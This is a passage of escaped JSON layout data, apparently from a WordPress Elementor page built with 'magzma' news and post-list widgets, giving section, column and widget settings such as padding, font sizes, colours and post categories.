icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"botto